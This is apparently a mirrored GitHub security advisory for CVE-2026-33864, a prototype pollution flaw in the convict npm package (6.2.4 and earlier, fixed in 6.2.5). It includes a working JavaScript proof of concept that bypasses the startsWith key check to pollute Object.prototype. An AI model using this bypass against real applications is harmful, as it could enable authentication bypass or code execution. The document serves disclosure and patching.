GHSA-44FC-8FM5-Q62H
Vulnerability from github – Published: 2026-03-26 18:55 – Updated: 2026-03-26 18:55Summary
A prototype pollution vulnerability exists in the latest version of the convict npm package (6.2.4). Despite a previous fix that attempted to mitigate prototype pollution by checking whether user input started with a forbidden key, it is still possible to pollute Object.prototype via a crafted input using String.prototype.
Details
The vulnerability resides in line 564 of https://github.com/mozilla/node-convict/blob/master/packages/convict/src/main.js where startsWith() function is used to check whether user provided input contain forbidden strings.
PoC
Steps to reproduce
- Install latest version of convict using
npm installor cloning from git - Run the following code snippet:
String.prototype.startsWith = () => false;
const convict = require('convict');
let obj = {};
const config = convict(obj);
console.log({}.polluted);
config.set('constructor.prototype.polluted', 'yes');
console.log({}.polluted); // prints yes -> the patch is bypassed and prototype pollution occurred
Expected behavior
Prototype pollution should be prevented and {} should not gain new properties. This should be printed on the console:
undefined
undefined OR throw an Error
Actual behavior
Object.prototype is polluted
This is printed on the console:
undefined
yes
Impact
This is a prototype pollution vulnerability, which can have severe security implications depending on how convict is used by downstream applications. Any application that processes attacker-controlled input using convict.set may be affected.
It could potentially lead to the following problems:
- Authentication bypass
- Denial of service
- Remote code execution (if polluted property is passed to sinks like eval or child_process)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 6.2.4"
},
"package": {
"ecosystem": "npm",
"name": "convict"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.2.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33864"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-26T18:55:41Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "### Summary\nA prototype pollution vulnerability exists in the latest version of the convict npm package (6.2.4). Despite a previous fix that attempted to mitigate prototype pollution by checking whether user input started with a forbidden key, it is still possible to pollute `Object.prototype` via a crafted input using `String.prototype`. \n\n### Details\nThe vulnerability resides in line 564 of https://github.com/mozilla/node-convict/blob/master/packages/convict/src/main.js where `startsWith()` function is used to check whether user provided input contain forbidden strings. \n\n### PoC\n#### Steps to reproduce\n1. Install latest version of convict using `npm install` or cloning from git\n2. Run the following code snippet:\n\n```javascript\nString.prototype.startsWith = () =\u003e false; \nconst convict = require(\u0027convict\u0027);\nlet obj = {};\nconst config = convict(obj);\nconsole.log({}.polluted);\nconfig.set(\u0027constructor.prototype.polluted\u0027, \u0027yes\u0027);\nconsole.log({}.polluted); // prints yes -\u003e the patch is bypassed and prototype pollution occurred\n```\n\n#### Expected behavior\nPrototype pollution should be prevented and {} should not gain new properties.\nThis should be printed on the console:\n```\nundefined\nundefined OR throw an Error\n```\n\n#### Actual behavior\n`Object.prototype` is polluted \nThis is printed on the console:\n```\nundefined \nyes\n```\n\n### Impact\nThis is a prototype pollution vulnerability, which can have severe security implications depending on how convict is used by downstream applications. Any application that processes attacker-controlled input using `convict.set` may be affected.\nIt could potentially lead to the following problems:\n\n1. Authentication bypass\n2. Denial of service\n3. Remote code execution (if polluted property is passed to sinks like eval or child_process)",
"id": "GHSA-44fc-8fm5-q62h",
"modified": "2026-03-26T18:55:41Z",
"published": "2026-03-26T18:55:41Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/mozilla/node-convict/security/advisories/GHSA-44fc-8fm5-q62h"
},
{
"type": "PACKAGE",
"url": "https://github.com/mozilla/node-convict"
},
{
"type": "WEB",
"url": "https://github.com/mozilla/node-convict/blob/master/packages/convict/src/main.js"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "Convict has Prototype Pollution via startsWith() function"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.